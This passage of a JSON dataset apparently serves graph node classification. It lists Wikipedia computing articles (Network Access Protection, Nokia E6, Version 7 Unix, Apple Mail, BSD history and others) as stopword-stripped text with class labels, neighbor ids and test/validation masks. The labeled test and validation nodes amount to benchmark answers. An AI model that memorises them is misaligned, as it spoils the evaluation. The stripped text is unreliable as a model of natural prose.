      4771,
      3750,
      7338,
      2222,
      708,
      10436,
      8396,
      5853,
      736,
      8929,
      10465,
      10470,
      9962,
      5363,
      2804,
      4341,
      10486,
      7935,
      3839,
      3843,
      5913,
      5915,
      11554,
      10020,
      10024,
      7983,
      10747,
      10043,
      6993,
      348,
      5471,
      7018,
      5492,
      6522,
      7554,
      8070,
      11161,
      2970,
      6555,
      7067,
      9114,
      11675,
      8610,
      8100,
      2474,
      4011,
      10673,
      3517,
      10686,
      9665,
      8652,
      6614,
      9176,
      479,
      3560,
      3562,
      6127,
      3573,
      7158,
      9211
    ],
    "mask": "None"
  },
  {
    "node_id": 9442,
    "label": 2,
    "text": "Network_Access_Protection:network access protection network access protection nap microsoft technology controlling network access computer based health nap system administrators organization define policies system health requirements examples system health requirements whether computer recent operating system updates installed whether computer latest version anti-virus software signature whether computer host-based firewall installed enabled computers nap client health status evaluated upon establishing network connection nap restrict deny network access computers compliance defined health requirements nap deprecated windows server 2012 r2 removed windows server 2016 network access protection client agent makes possible clients support nap evaluate software updates statement health nap clients computers report system health nap enforcement point nap enforcement point computer device evaluate nap client ’ health optionally restrict network communications nap enforcement points ieee 802.1x-capable switches vpn servers dhcp servers health registration authorities hras run windows server 2008 later nap health policy server computer running network policy server nps service windows server 2008 later stores health requirement policies provides health evaluation nap clients health requirement policies configured administrators define criteria clients must meet allowed undeterred connection criteria may include version operating system personal firewall up-to-date antivirus program nap-capable client computer contacts nap enforcement point submits current health state nap enforcement point sends nap client ’ health state nap health policy server evaluation using radius protocol nap health policy server also act radius-based authentication server nap client nap health policy server use health requirement server validate health state nap client determine current version software updates need installed nap client example health requirement server might track latest version antivirus signature file nap enforcement point hra obtains health certificates certification authority nap clients determined compliant health requirements nap client determined noncompliant health requirements optionally placed restricted network restricted network logical subset intranet contains resources allow noncompliant nap client correct system health servers contain system health components updates known remediation servers noncompliant nap client restricted network access remediation servers install necessary components updates remediation complete nap client perform new health evaluation conjunction new request network access communication nap client ships windows vista windows 7 windows 8 windows 8.1 windows 10 limited nap client also included windows xp service pack 3 mmc snap-in support authip-based ipsec enforcement managed via command-line tool called netsh ipsec enforcement ike-based microsoft partners provide nap clients operating systems mac os x linux turn network access protection windows 8 simultaneously hold x key windows key computer keyboard mine bottom row 3rd left use arrow select search touch enter key search defaults apps type services click scroll network access protection agent service click status column say running right click left click start status column say running close services window",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      8753,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      5221,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      8315,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      10908,
      3742,
      7838,
      9377,
      3235,
      4771,
      2213,
      6820,
      1703,
      11434,
      2221,
      2737,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      6904,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      8998,
      5928,
      3881,
      10024,
      10026,
      10029,
      1844,
      9525,
      11572,
      823,
      10039,
      6972,
      3394,
      10058,
      3922,
      4439,
      5465,
      2402,
      2919,
      3944,
      4458,
      6506,
      9066,
      5490,
      9593,
      2943,
      8576,
      1418,
      5003,
      5004,
      8080,
      4505,
      11677,
      929,
      11683,
      939,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      6586,
      960,
      8132,
      6088,
      969,
      8654,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      2027,
      6637,
      9709,
      6641,
      3573,
      3064,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 9443,
    "label": 2,
    "text": "Nokia_E6:nokia e6 nokia e6-00 smartphone running symbian^3 operating system supersedes nokia e72 new symbian business mobility solution nokia following announcement 12 april 2011 day nokia x7-00 shipped new symbian anna version symbian^3 originally retailed 340 euros taxes smartphone notable backlit 4-rows qwerty keyboard touch screen input methods long battery life talktime 7.5 14.8 h standby 28 31 days out-of-the-box access microsoft exchange activesync microsoft communicator mobile microsoft sharepoint high pixel density vga display 326ppi like predecessors nokia e71/e72 nokia e6-00 integrates stainless steel glass design back removable cover raised panel back camera dual led flash loud speaker contour front made stainless steel front phone except qwerty keyboard short cut buttons navikey covered corning gorilla glass casing three color options black silver white e6 would also last symbian-based device qwerty keyboard later qwerty devices would series 40 asha line nokia asha 302 2012 bears strong design similarities e6 october 2012 vertu released constellation quest blue based e6 predecessor e6-00 eseries consisting business-oriented smartphones nokia e72 shipped november 2009 e71 e72 received mostly praises press worth noting nokia released e7 landscape qwerty slider smartphone eseries based symbian^3 shipped february 2011 first hints nokia e6-00 developed came early january 2011 nokia xml pictures picasa album pictures taken device various information could retrieved xml 8 mp camera vga display qwerty keyboard device officially announced mobile world congress held barcelona 14–17 february 2011 various pictures videos nokia e6-00 leaked months february march officially announced special event named discover symbian 12 april 2011 along nokia x7 latest update symbian software expected released q2 2011 europe price €340 taxes subsidies q3 2011 north america may 2011 nokia e6 became available nokia deutschland online shop preorder price €429 nokia e6-00 powered processor found contemporary symbian devices nokia n8 e7 c7 nokia e series arm11 clocked 680 mhz broadcom bcm2727 gpu supports openvg1.1 opengl es 2.0 support nokia e6-00 62.5 mm diagonally capacitive touchscreen resolution 640 × 480 pixel vga 326 ppi according nokia capable displaying 16.7m colours pixel density highest among smartphones launched time launch nokia lumia 920 screen brightness e6-00 double brightness e72 measured candelas proximity sensor deactivates display touchscreen device brought near face call nokia e6 also understands pictbridge protocol possible directly print phone printer without using computer handle data transfer optical navi key e72 replaced navi key e6-00 also ambient light sensor adjusts display brightness activates backlit 4-row keyboard 3-axis accelerometer present switch display portrait mode device turned sideways however take pictures portrait show right way photo gallery device autonomous gps optional a-gps functionality wi-fi network positioning cell-id comes pre-loaded ovi maps application ovi maps symbian^3 provides free lifetime turn turn voice guided car pedestrian navigation map already downloaded device ovi maps require active data connection work stand-alone gps navigator services example google maps data connection required 8-megapixel 3264 x 2448 px back camera extended depth field feature autofocus dual led flash 2x digital zoom 3x video mode offers high definition 720p 16:9 aspect ratio video recording 25 frame/s 4:3 aspect ratio 0.3-megapixel front camera capable video recording 176 x 144 px 15 frame/s video calling nokia e6 loudspeaker two microphones microphone front device collects voices user another microphone back device collects environmental noise active noise cancellation makes user voice noisy environment sound clearer person end line noise cancellation available using loudspeaker headset front device qwerty keyboard call creation call termination keys home menu calendar contact email shortcut keys short long press features 5-way scrolling navi key top power/lock button right hand side lock/unlock slider also turn torch dual led flash camera button three keys 1 volume 2 volume 3 middle key activating voice commands long press voice recorder short press device locked pressing navi also bring menu allow unlock nokia e6-00 touch screen qwerty keyboard comes variety 24 language versions including arabic thai russian chinese e6-00 microphone loudspeaker located back device 3.5 mm four-contact audio jack simultaneously provides stereo audio output either microphone input video output pal ntsc tv possible using nokia video connectivity cable included upon purchase standard 3.5 mm audio jack rca cable high-speed usb 2.0 usb micro-b connector provided data synchronization mass storage mode client battery charging nokia e6-00 supports usb on-the-go 1.3 ability act usb host using nokia adapter cable usb otg ca-157 included upon purchase built-in bluetooth v3 supports wireless earpieces headphones hsp profile nokia e6-00 also capable stereo audio output a2dp profile built-in car hands-free kits also supported hfp profile file transfer supported ftp along opp profile sending/receiving objects possible remote control device avrcp profile dun profile permits access internet laptop dialing mobile phone wirelessly tethering profiles also supported bip gap gavdp goep hsp pbap sap sdp spp device 87.5-108 mhz 76-90 mhz japan fm receiver rds support wi-fi b/g/n connectivity single band support wep wpa wpa2 aes/tkip security protocols bp-4l 1500 mah li-ion battery performance provided nokia 14.8h talk time 681h standby 9h video playback 4.7h video recording 75h music play back nokia e6-00 8 gb internal storage expanded microsdhc card 32 gb size 1 gb rom 350 mb available user install applications new users nokia e6 experienced problems notification led placed d-pad navigation key previous models e71 e72 however apparent nokia allowed sufficient space d-pad key front face light visible nokia acknowledged problem indicated whether fix possible software adjusting brightness component one solution done aniket patil aniketroxx redirect notification light red mute key used many people alternative d-pad fix solution also helped user see light without opening e6 cover revised nokia e6 hardware change resolve notification light issue started shipping 22 october 2011 many users nokia e6 reported vibration alert strong enough along nokia x7 e6-00 shipped updated symbian^3 software user experience update nicknamed anna offers amongst others preinstalled applications nokia e6-00 include joikuspot premium mobile wifi hotspot world traveler f-secure mobile security quickoffice stock os version symbian anna specially adapted e6 february 2012 nokia belle update heavily criticised failure meet special demands e6 met original stock firmware august 2012 nokia belle refresh made available due vga 640 x 480 resolution compared nhd 640 x 360 symbian^3 devices application may incompatible e6-00 designed nhd display example nokia guidelines stipulate user interface elements touch screen accept button virtual numpad etc ... least 7mm x 7mm high pixel density nokia e6-00 means elements need proportionately larger pixels compared recent symbian^3 devices nokia e6-00 two extra homescreens bringing total 5 homescreens give users opportunity customization devices smaller displays accommodating 3 widgets per homescreen nokia e6 wifi coverage full spectrum channels 1-13 crowded 2.4 ghz waveband compared channels 1-11 e63 example support newer 5 ghz wifi frequencies charging led workaround notifications",
    "neighbors": [
      1537,
      11271,
      529,
      10770,
      5143,
      2072,
      5659,
      4132,
      40,
      3626,
      3629,
      10802,
      7220,
      5175,
      1083,
      9292,
      7246,
      1615,
      5201,
      7253,
      5211,
      6748,
      1633,
      109,
      6276,
      3205,
      9359,
      659,
      5274,
      669,
      6310,
      167,
      5290,
      10410,
      7866,
      1216,
      1728,
      4291,
      7877,
      199,
      4305,
      2259,
      6870,
      11487,
      737,
      3300,
      4324,
      7399,
      8423,
      1776,
      8433,
      8472,
      11545,
      1833,
      7983,
      821,
      9537,
      10053,
      6996,
      854,
      10583,
      10599,
      6505,
      5998,
      2945,
      8577,
      11655,
      1424,
      2449,
      8083,
      7063,
      5019,
      4003,
      9137,
      7617,
      967,
      1533
    ],
    "mask": "Test"
  },
  {
    "node_id": 9444,
    "label": 2,
    "text": "Version_7_Unix:version 7 unix seventh edition unix also called version 7 unix version 7 v7 important early release unix operating system v7 released 1979 last bell laboratories release see widespread distribution commercialization unix corporation early 1980s v7 originally developed digital equipment corporation pdp-11 minicomputers later ported platforms unix versions bell labs designated edition user manual accompanied released 1979 seventh edition preceded sixth edition first version licensed commercial users development research unix line continued eighth edition incorporated development 4.1bsd tenth edition bell labs researchers concentrated developing plan 9 v7 first readily portable version unix era minicomputers many architectural variations also beginning market 16-bit microprocessors many ports completed within first years release first sun workstations based motorola 68010 ran v7 port unisoft first version xenix intel 8086 derived v7 onyx systems soon produced zilog z8000 computer running v7 vax port v7 called unix/32v direct ancestor popular 4bsd family unix systems group university wollongong ported v6 interdata 7/32 ported v7 machine well interdata sold port edition vii making first commercial unix offering dec distributed pdp-11 version v7 called v7m modified v7m developed dec original unix engineering group ueg contained many enhancements kernel pdp-11 line computers including significantly improved hardware error recovery many additional device drivers ueg evolved group later developed ultrix due power yet elegant simplicity many old-time unix users remember v7 pinnacle unix development dubbed last true unix improvement preceding following unices time release though greatly extended feature set came expense decrease performance compared v6 corrected largely user community number system calls version 7 around 50 later unix unix-like systems continued add many 2002 caldera international released v7 foss permissive bsd-like software license bootable images v7 still downloaded today run modern hosts using pdp-11 emulators simh x86 port developed nordier associates paul allen maintained several publicly accessible historic computer systems including pdp-11/70 running unix version 7 many new features introduced version 7 portable c compiler pcc provided along earlier pdp-11-specific c compiler ritchie first appeared research unix lineage version 7 although early versions already picked pwb/unix feature survive long second way besides pipes inter-process communication multiplexed files process could create special type file codice_1 system call processes could open file get channel denoted file descriptor could used communicate process created multiplexed file mpx files considered experimental enabled default kernel disappeared later versions offered sockets bsd cb unix ipc facilities system v instead although mpx files still present 4.1bsd",
    "neighbors": [
      640,
      515,
      2179,
      6787,
      9735,
      6412,
      8207,
      6675,
      5397,
      1304,
      2073,
      6813,
      3487,
      3488,
      8991,
      1316,
      7460,
      7847,
      7848,
      3241,
      5293,
      4398,
      7983,
      3248,
      2995,
      9141,
      823,
      1336,
      7224,
      8631,
      9784,
      9151,
      9665,
      451,
      9027,
      9540,
      3526,
      10436,
      1865,
      6218,
      3659,
      4433,
      9298,
      2132,
      3960,
      470,
      11604,
      6617,
      6369,
      2786,
      6120,
      8553,
      9320,
      9452,
      4333,
      8301,
      11632,
      499,
      2035,
      5492,
      2424,
      633,
      4859,
      1277
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9445,
    "label": 3,
    "text": "Cell_software_development:cell software development software development cell microprocessor involves mixture conventional development practices powerpc-compatible ppu core novel software development challenges regard functionally reduced spu coprocessors open source software-based strategy adopted accelerate development cell ecosystem provide environment develop cell applications including gcc-based cell compiler binutils port linux operating system octopiler ibm prototype compiler allow software developers write code cell processors vmx vector multimedia extensions technology conceptually similar vector model provided spu processors many significant differences vmx java mode conforms java language specification 1 subset default ieee standard extended include ieee c9x compliance java standard falls silent typical implementation non-java mode converts denormal values zero java mode traps emulator processor encounters value ibm ppe vector/simd manual define operations double-precision floating point though ibm published material implying certain double-precision performance numbers associated cell ppe vmx technology compilers cell provide intrinsics expose useful spu instructions c c++ instructions differ type operand ai ah ahi fa dfa addition typically represented single c/c++ intrinsic selects proper instruction based type operand great body code developed ibm power processors could potentially adapted recompiled run spu code base includes vmx code runs powerpc version apple mac os x better known altivec depending many vmx specific features involved adaptation involved range anywhere straightforward onerous completely impractical important workloads spu generally map quite well cases possible port existing vmx code directly vmx code highly generic makes assumptions execution environment translation relatively straightforward two processors specify different binary code format recompilation required minimum even instructions exist behaviors instruction names must mapped well ibm provides compiler intrinsics take care mapping transparently part development toolkit many cases however directly equivalent instruction exist workaround might obvious might example saturation behavior required spu coded adding additional spu instructions accomplish loss efficiency extreme java floating-point semantics required almost impossible achieve spu processor achieve computation spu might require entirely different algorithm written scratch important conceptual similarity vmx spu architecture supporting vectorization model reason algorithms adapted altivec usually adapt successfully spu architecture well transferring data local stores different spus large performance cost local stores individual spus exploited using variety strategies applications high locality dense matrix computations represent ideal workload class local stores cell streaming computations efficiently accommodated using software pipelining memory block transfers using multi-buffering strategy software cache offers solution random accesses sophisticated applications use multiple strategies different data types",
    "neighbors": [
      9472,
      643,
      7071,
      1952,
      9126,
      6311,
      5677,
      306,
      7218,
      9911,
      6072,
      8120,
      1985,
      3025,
      6738,
      342,
      1115,
      859,
      4060,
      3677,
      8680,
      8937,
      10985,
      4587,
      6004,
      2293,
      8700,
      1784,
      3323,
      6268,
      6909
    ],
    "mask": "None"
  },
  {
    "node_id": 9446,
    "label": 3,
    "text": "Wizardry_III:_Legacy_of_Llylgamyn:wizardry iii legacy llylgamyn wizardry iii legacy llylgamyn originally known wizardry legacy llylgamyn third scenario third scenario wizardry series role-playing video games published 1983 sir-tech software inc city llylgamyn threatened violent forces nature earthquakes volcanic rumblings endanger everyone seeking dragon l'kbreth city saved legacy llylgamyn another six level dungeon crawl although dungeon volcano party journeys upwards rather downwards gameplay spells identical first two scenarios parties six characters could adventure one time characters imported either however since game set years later characters actually descendants original characters kept name class could select new alignment class permitting reset level one alignment made significant—certain areas game accessible appropriately aligned good evil parties first level accessible parties good neutral evil note evil good characters unwilling adventure together party always either good least one good character rest neutral evil least one evil character rest neutral neutral characters neutral second fourth levels could accessed parties evil characters—good neutral parties third fifth levels could accessed parties good characters—evil neutral parties sixth level could accessed party least one good one evil character—no neutral parties neutral characters could travel areas last level theoretically could get game party six characters neutral practically speaking players forced build 6 characters party could function long term without cleric good evil wizard good evil lord good healing effect prolonging gameplay wizardry iii first adventure game window manager released first games apple macintosh philip l. wing reviewed legacy llylgamyn space gamer 72 wing commented wizardry iii legacy llylgamyn best scenario series yet solid story riddles appropriate scenario game recommended original characters solid stats first two games required softline 1983 praised llylgamyn stating n't written composed ... dungeon feels like living breathing entity concluding game best wizardry yet 1984 readers named game second most-popular apple program 1983 behind lode runner computer gaming world scorpia 1991 1993 called game wizardry bells whistles added stated novelty playing two separate groups adventurers one good one evil little distinguish previous two games",
    "neighbors": [
      10449,
      5260,
      6109,
      9166
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9447,
    "label": 4,
    "text": "RFPolicy:rfpolicy rfpolicy states method contacting vendors security vulnerabilities found products originally written hacker security consultant rain forest puppy policy gives vendor five working days respond reporter bug vendor fails contact reporter five days issue recommended disclosed general community reporter help vendor reproduce bug work fix reporter delay notifying general community bug vendor provides feasible reasons requiring vendor fails respond shuts communication reporter problem five working days reporter disclose issue general community issuing alert fix vendor give reporter proper credits reporting bug",
    "neighbors": [
      3944,
      9217,
      4117
    ],
    "mask": "Test"
  },
  {
    "node_id": 9448,
    "label": 2,
    "text": "Metro_(design_language):metro design language microsoft design language mdl design language created microsoft design language focused typography simplified icons absence clutter increased content chrome ratio content chrome basic geometric shapes early examples mdl principles found encarta 95 msn 2.0 design language evolved windows media center zune formally introduced metro unveiling windows phone 7 since incorporated several company products including xbox 360 system software xbox one windows 8 windows phone outlook.com microsoft design language title became official microsoft representative qi lu referred modern ui design language mixx conference keynote speech according microsoft metro always codename never meant final product news websites attribute change trademark issues microsoft design language 2 mdl2 developed alongside windows 10 later fluent design language extended design language based design principles classic swiss graphic design early glimpses style could seen windows media center windows xp media center edition favored text primary form navigation interface carried later iterations media center 2006 zune refreshed interface using principles microsoft designers decided redesign interface focus clean typography less ui chrome principles new zune ui carried windows phone much drawn windows 8 zune desktop client also redesigned emphasis typography clean design different zune previous portable media center based ui flat colored live tiles introduced design language early windows phones studies microsoft design language 2 mdl2 developed alongside windows 10 version introduced new set widgets including date pickers toggles switches reduced border thicknesses user interface elements microsoft design team cites inspiration design language signs commonly found public transport systems design language places emphasis good typography large text catches eye microsoft sees design language sleek quick modern refresh icon-based interfaces windows android ios instances use fonts based segoe font family designed steve matteson agfa monotype licensed microsoft zune microsoft created custom version called zegoe ui windows phone microsoft created segoe wp font family fonts mostly differ minor details obvious differences segoe ui segoe wp apparent respective numerical characters segoe ui font windows 8 obvious differences – similar segoe wp characters notable typographic changes included 1 2 4 5 7 8 q. microsoft designed design language specifically consolidate groups common tasks speed usage achieves excluding superfluous graphics instead relying actual content function main ui resulting interfaces favor larger hubs smaller buttons often feature laterally scrolling canvases page titles usually large consequently also take advantage lateral scrolling animation plays large part microsoft recommends consistent acknowledgement transitions user interactions presses swipes form natural animation motion aims give user impression alive responsive ui added sense depth early response language generally positive review zune hd engadget said microsoft continues push towards big big typography providing sophisticated neatly designed layout almost functional attractive cnet complimented design language saying bit daring informal tight sterile icon grids rolodex menus iphone ipod touch idea 2011 ceremony industrial designers society america idsa gave windows phone 7 uses ui gold interactive award people choice award best show award isabel ancona user experience consultant idsa explained windows phone criticism particularly focused use caps text rise internet usage critics compared computer program shouting user journalist lee hutchinson described microsoft use practice macos version onenote terrible claiming cursed insane non-standard application window menus caps ’ much violate os x ’ design conventions take behind shed pour gasoline set fire arrival windows 8 operating system user interface use design language drew generally negative critical responses 25 august 2012 peter bright ars technica reviewed preview release windows 8 dedicating first part review comparison start menu designs used windows 8 windows 7 recounting pros cons peter bright concluded start menu windows 8 dubbed start screen though devoid problems clear winner however concluded windows 8 user interface frustrating various aspects user interface work well together woody leonhard even critical said user standpoint windows 8 failure – awkward mishmash pulls user two directions addition changes start menu windows 8 takes modal approach use full-screen apps steer away reliance icon-based desktop interface however microsoft shifted focus away multitasking business productivity august 2012 verge announced internal memorandum sent developers microsoft employees announcing decision discontinue use term metro discussions important european partner working replacement term technology news outlets ars technica techradar cnet engadget network world mainstream press bits blog new york times company bbc news online published partner mentioned memo could one microsoft retail partners german company metro ag name potential infringe metro trademark microsoft later stated reason de-emphasizing name related current litigation metro internal project codename despite heavily promoted brand public september 2012 microsoft design language adopted official name design style term used microsoft developer network documentation 2012 build conference refer design language related change microsoft dropped use phrase metro-style apps refer mobile apps distributed via windows store",
    "neighbors": [
      11283,
      6171,
      8736,
      8740,
      11301,
      6697,
      1581,
      2101,
      8757,
      582,
      1098,
      8798,
      4704,
      10338,
      8296,
      617,
      5225,
      8299,
      6265,
      8315,
      636,
      1148,
      639,
      641,
      651,
      6797,
      2196,
      10388,
      10900,
      6827,
      9903,
      3250,
      9910,
      4289,
      10957,
      9434,
      4316,
      10989,
      4356,
      11524,
      782,
      8976,
      3857,
      11549,
      6431,
      7970,
      1832,
      6441,
      3890,
      6972,
      6462,
      321,
      9539,
      9033,
      11605,
      2391,
      11103,
      8576,
      3462,
      3463,
      10118,
      1935,
      8080,
      4505,
      4515,
      3496,
      7615,
      7106,
      6088,
      7629,
      4051,
      9173,
      11221,
      5600,
      488,
      8681,
      4074,
      5103
    ],
    "mask": "Test"
  },
  {
    "node_id": 9449,
    "label": 7,
    "text": "DynamicOps:dynamicops dynamicops private software company headquartered burlington massachusetts usa backed credit suisse intel capital sierra ventures next world capital dynamicops develops cloud automation management solutions solutions designed help enterprise organizations create scalable private public desktop cloud services days existing technology systems processes acquired vmware 2012 dynamicops origins credit suisse software initially developed inside credit suisse ’ global research development group 2005 help company address operational governance challenges rolling virtualization technology 2008 deployed used software manage thousands virtual machines credit suisse ventures decided form company based technology recruited rich krueger form lead new company—dynamicops dynamicops incorporated january 31 2008 publicly launch later spring—to develop market product leslie muller led development effort credit suisse became founder cto dynamicops company raised total 27m venture funding credit suisse intel capital sierra ventures next world capital july 2012 dynamicops acquired vmware operations virtualization foundational technology dynamicops ’ cloud offerings operations virtualization abstraction layer multiple management systems make cloud infrastructure consumers allows staff apply management layers without layers needing know dynamicops multi-year licensing distribution agreement dell dynamicops software component virtual integrated system solution company technology alliances number companies including amazon web services cisco citrix hp ibm microsoft netapp novell red hat symantec vmware",
    "neighbors": [
      9569,
      4194,
      5384,
      6153,
      5371,
      7248,
      9455,
      1400,
      3323
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9450,
    "label": 8,
    "text": "Tempus_Nova:tempus nova tempus nova denver-based consulting firm specializes migrating large scale on-premises email messaging systems cloud-based g suite founded 2001 tempus nova specializes google enterprise solutions g suite implementations custom application development cloud computing company provides implementation deployment services organizations seeking move on-premises solutions g suite basic business enterprise services include project management technical support training change management continuing support post-deployment custom application development tempus nova works public private enterprises move communications collaboration cloud-based technology tempus nova works google provide services reduce costs companies utilizing cloud 2011 company partnered united states federal government implement cloud-based email system general services administration company also responsible migrating state governments wyoming utah colorado first three u.s. state governments adopt g suite addition partnerships u.s. federal state governments tempus nova worked several major corporations transfer legacy data g suite including retail brand kohl ’ comex group avery dennison denny tempus nova sole developer proprietary interoperability connectivity coexistence migration archiving tools used migrating lotus notes users g suite company provides several enterprise software products used government universities large organizations notable products include tempus nova developed partnerships several organizations solution providers company certified g suite reseller google premier partner google partner advisory board member google cloud transformation partner salesforce reseller ibm premier partner microsoft certified business partner cdw partner exclusive gp strategies partner among others",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 9451,
    "label": 2,
    "text": "Apple_Mail:apple mail apple mail officially known simply mail email client included apple inc. operating systems macos ios watchos apple mail grew nextmail originally developed next part nextstep operating system apple acquisition next 1997 current version apple mail utilizes smtp message sending pop3 exchange imap message retrieval s/mime end-to-end message encryption also preconfigured work popular email providers yahoo mail aol mail gmail outlook icloud formerly mobileme supports exchange ios features mobile version apple mail added exchange activesync eas support though notoriously missed functionality attaching files reply emails release ios 9 eas supported macos version apple mail app main issue sent messages incorrectly duplicated sent messages folder propagates via sync devices including ios features apple mail include ability configure software receive user email accounts one list ability file emails folders ability search emails ability automatically append signatures outgoing emails also integrates contacts list calendar maps apps apple mail originally developed next nextmail email application nextstep operating system nextmail innovative time supported rich text formatting images voice messaging mime emails also supported plain text tui allow backwards compatibility apple began adapt nextstep become mac os x operating system application went various stages developed beta version codenamed rhapsody various early pre-releases mac os x mail known mailviewer however third developer release mac os x application returned known simply mail apple mail included versions macos including mac os x panther released october 24 2003 integrated apple applications address book ichat ical features remain recent version mail include rules mailboxes junk mail filtering multiple account management mac os x tiger version 10.4 mail version 2 included proprietary single-message-per-file format filename extension .emlx permit indexing spotlight additional features new version also changed ui buttons toolbar whereas previous buttons free-standing defined shapes new buttons featured shapes within lozenge-shaped capsule according many users even apple human interface guidelines time worse usability open-source third-party application reverted icons former shapes available nevertheless apple updated guidelines include capsule-shaped buttons new ui persisted mac os x leopard version 10.5 mail version 3 included personalized stationery handled standard html format addition offered notes to-dos could synced ical well built-in rss reader also introduced imap idle support account inboxes mac os x snow leopard version 10.6 brought microsoft exchange server 2007 support ical address book applications bundled os x 10.6 mac os x lion version 10.7 mail featured redesigned ipad-like user interface full-screen capabilities updated message search interface support microsoft exchange server 2010 yahoo mail via imap also added capability group messages subject similar fashion mail ios 4 bounce function unwanted emails could bounced back sender dropped support exchange push email os x mountain lion version 10.8 mail received vip tagging safari-style inline search words within email message ability sync icloud new sharing features notes split stand-alone application rss reader to-dos discontinued os x mavericks version 10.9 mail ceased support plain-text mime multipart/alternative messages solely retained html rich-text version os x yosemite version 10.10 mail introduced markup inline annotation pdf image files mail drop automatically uploads attachments icloud sends link message instead whole file os x el capitan version 10.11 filter added message list filter various options unread flagged messages attachments conversation display also redesigned various disk space saving optimizations implemented streaming notification support exchange accounts also added support macos new dark mode added mail",
    "neighbors": [
      2050,
      10755,
      9732,
      4615,
      1549,
      10765,
      5647,
      7697,
      1042,
      9747,
      11289,
      2076,
      6186,
      4139,
      6700,
      559,
      4657,
      1074,
      1075,
      8754,
      2101,
      9784,
      8253,
      576,
      9281,
      9802,
      8783,
      5713,
      4180,
      5205,
      3670,
      1623,
      3672,
      4184,
      6231,
      7255,
      8283,
      2141,
      4702,
      6237,
      3681,
      9826,
      2149,
      8806,
      3691,
      10861,
      8303,
      2673,
      6771,
      2676,
      5749,
      6261,
      2679,
      7292,
      2686,
      6783,
      1664,
      7806,
      5114,
      9343,
      10878,
      3719,
      10888,
      4746,
      2187,
      8331,
      11402,
      8852,
      1686,
      7318,
      5784,
      1177,
      11418,
      3228,
      2207,
      1699,
      11430,
      5292,
      8877,
      1710,
      2735,
      3248,
      9908,
      9909,
      3766,
      2232,
      9912,
      4283,
      3772,
      7869,
      9406,
      1729,
      6849,
      713,
      9418,
      10956,
      3790,
      7378,
      10450,
      3286,
      4310,
      9430,
      3289,
      3293,
      4318,
      6884,
      231,
      1772,
      4844,
      2288,
      9459,
      7928,
      8441,
      11000,
      8443,
      7420,
      7422,
      10838,
      9986,
      2819,
      1796,
      11521,
      1290,
      3338,
      784,
      1297,
      10512,
      4888,
      5912,
      11037,
      10023,
      1834,
      811,
      3371,
      4399,
      7983,
      10036,
      7991,
      9529,
      2363,
      2365,
      2366,
      9022,
      7488,
      1346,
      10562,
      4933,
      7496,
      10057,
      9035,
      1878,
      4957,
      9053,
      6495,
      9063,
      4457,
      3948,
      8557,
      10608,
      7036,
      3971,
      2439,
      6023,
      3465,
      4490,
      6539,
      7052,
      8584,
      9100,
      10126,
      10631,
      9109,
      5016,
      3483,
      1439,
      2979,
      9642,
      4013,
      8109,
      2492,
      446,
      7614,
      8640,
      2502,
      3015,
      456,
      1482,
      6093,
      7118,
      464,
      5078,
      8662,
      9174,
      3035,
      4571,
      7133,
      9182,
      10722,
      7139,
      4068,
      5093,
      5605,
      487,
      2023,
      8169,
      10221,
      7154,
      5619,
      11257,
      3578,
      7163,
      6654
    ],
    "mask": "Test"
  },
  {
    "node_id": 9452,
    "label": 2,
    "text": "History_of_the_Berkeley_Software_Distribution:history berkeley software distribution history berkeley software distribution begins 1970s earliest distributions unix bell labs 1970s included source code operating system allowing researchers universities modify extend unix operating system arrived berkeley 1974 request computer science professor bob fabry program committee symposium operating systems principles unix first presented pdp-11/45 bought run system budgetary reasons machine shared mathematics statistics groups berkeley used rsts unix ran machine eight hours per day sometimes day sometimes night larger pdp-11/70 installed berkeley following year using money ingres database project also 1975 ken thompson took sabbatical bell labs came berkeley visiting professor helped install version 6 unix started working pascal implementation system graduate students chuck haley bill joy improved thompson pascal implemented improved text editor ex universities became interested software berkeley 1977 joy started compiling first berkeley software distribution 1bsd released march 9 1978 1bsd add-on version 6 unix rather complete operating system right thirty copies sent second berkeley software distribution 2bsd released may 1979 included updated versions 1bsd software well two new programs joy persist unix systems day vi text editor visual version ex c shell 75 copies 2bsd sent bill joy feature networking package called berknet developed eric schmidt part master thesis work could connect twenty-six computers provided email file transfer 3bsd see come vax line computers new releases 2bsd pdp-11 still issued distributed usenix example 1982 2.8.1bsd included collection fixes performance problems version 7 unix later releases contained ports changes vax-based releases bsd back pdp-11 architecture 2.9bsd 1983 included code 4.1cbsd first release full os modified v7 unix rather set applications patches recent release 2.11bsd first issued 1992 21st century maintenance updates volunteers continued patch 451 released december 22 2018 vax computer installed berkeley 1978 port unix vax architecture unix/32v take advantage vax virtual memory capabilities kernel 32v largely rewritten berkeley students include virtual memory implementation complete operating system including new kernel ports 2bsd utilities vax utilities 32v released 3bsd end 1979 3bsd also alternatively called virtual vax/unix vmunix virtual memory unix bsd kernel images normally called codice_1 4.4bsd success 3bsd major factor defense advanced research projects agency darpa decision fund berkeley computer systems research group csrg would develop standard unix platform future darpa research vlsi project 4bsd november 1980 offered number enhancements 3bsd notably job control previously released csh delivermail antecedent sendmail reliable signals curses programming library 1985 review bsd releases john quarterman et al wrote 4.1bsd june 1981 response criticisms bsd performance relative dominant vax operating system vms 4.1bsd kernel systematically tuned bill joy could perform well vms several benchmarks release would called 5bsd objections name changed feared confusion unix system v. 4.2bsd august 1983 would take two years implement contained several major overhauls official release came three intermediate versions 4.1a incorporated modified version bbn preliminary tcp/ip implementation 4.1b included new berkeley fast file system implemented marshall kirk mckusick 4.1c interim release last months 4.2bsd development back bell labs 4.1cbsd became basis 8th edition research unix commercially supported version available mtxinu guide design 4.2bsd duane adams darpa formed steering committee consisting bob fabry bill joy sam 